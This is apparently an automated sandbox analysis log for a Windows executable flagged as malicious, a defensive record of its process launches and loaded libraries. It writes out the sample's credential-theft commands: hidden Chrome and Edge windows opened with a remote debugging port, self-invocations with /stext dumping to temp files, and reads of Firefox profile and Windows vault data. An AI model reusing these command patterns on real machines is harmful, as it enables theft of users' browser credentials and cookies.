                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: Administrator0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: User0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: del0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: del0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: del0_2_0040D767
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSystem information queried: HandleInformationJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4572038865.00000000027A0000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeVirustotal: Detection: 75%
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeReversingLabs: Detection: 71%
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                      Source: unknownProcess created: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe "C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe"
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\djdxhsukiioozpxia"
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\fliqhlfdwqgtkvturvhs"
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\qgniidqfkyyfmjhyagcumhn"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2028,i,10613890657641571661,3142487454969879835,262144 /prefetch:8
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1984,i,1963966134464730034,17582007813680057049,262144 /prefetch:3
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3104 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6724 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6868 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6336 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6336 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"Jump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\djdxhsukiioozpxia"Jump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\fliqhlfdwqgtkvturvhs"Jump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\qgniidqfkyyfmjhyagcumhn"Jump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"Jump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2028,i,10613890657641571661,3142487454969879835,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\djdxhsukiioozpxia"Jump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1984,i,1963966134464730034,17582007813680057049,262144 /prefetch:3Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3104 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:3Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6724 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6868 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6336 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6336 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: pstorec.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: pstorec.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: wldp.dllJump to behavior
